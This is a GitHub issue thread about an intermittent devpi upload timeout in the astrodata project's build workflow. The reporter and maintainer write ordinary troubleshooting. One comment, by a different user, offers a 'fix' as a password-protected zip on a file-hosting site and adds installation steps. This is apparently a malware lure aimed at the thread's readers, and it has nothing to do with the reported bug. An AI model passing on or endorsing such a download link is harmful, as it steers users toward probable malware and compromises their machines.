### ISSUE TITLE
[BUG] `devpi` timeout for build testing

### ISSUE THREAD

**Issue by teald** [GeminiDRSoftware/astrodata#56]
**Describe the bug**
Sometimes on actions runners, after uploading `astrodata` an `HTTPConnectionPool` timeout will be encountered:
```
HTTPConnectionPool(host='localhost', port=1420): Read timed out. (read timeout=15)
```

There are no other logs for this.

**To Reproduce**

[example run]: https://github.com/GeminiDRSoftware/astrodata/actions/runs/10563927512/job/29265713246

Steps and requirements to reproduce the behavior:
1. Try to set up `devpi` server and upload a `astrodata` wheel
2. *Intermittently*, e.g., [this example Github Actions run][example run], it will then timeout as described above.

**Desktop (please complete the following information):**
 - OS: Actions runner `ubuntu-latest`

**Additional context**

This started after updates to workflows addressing Issue #55. It's unclear if that's the cause of the problem, though.

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by teald** [comment]
This stopped happening after the issue was raised, and debug logs didn't show anything immediately suspect. Cautiously closing this as a runner fluke for now.
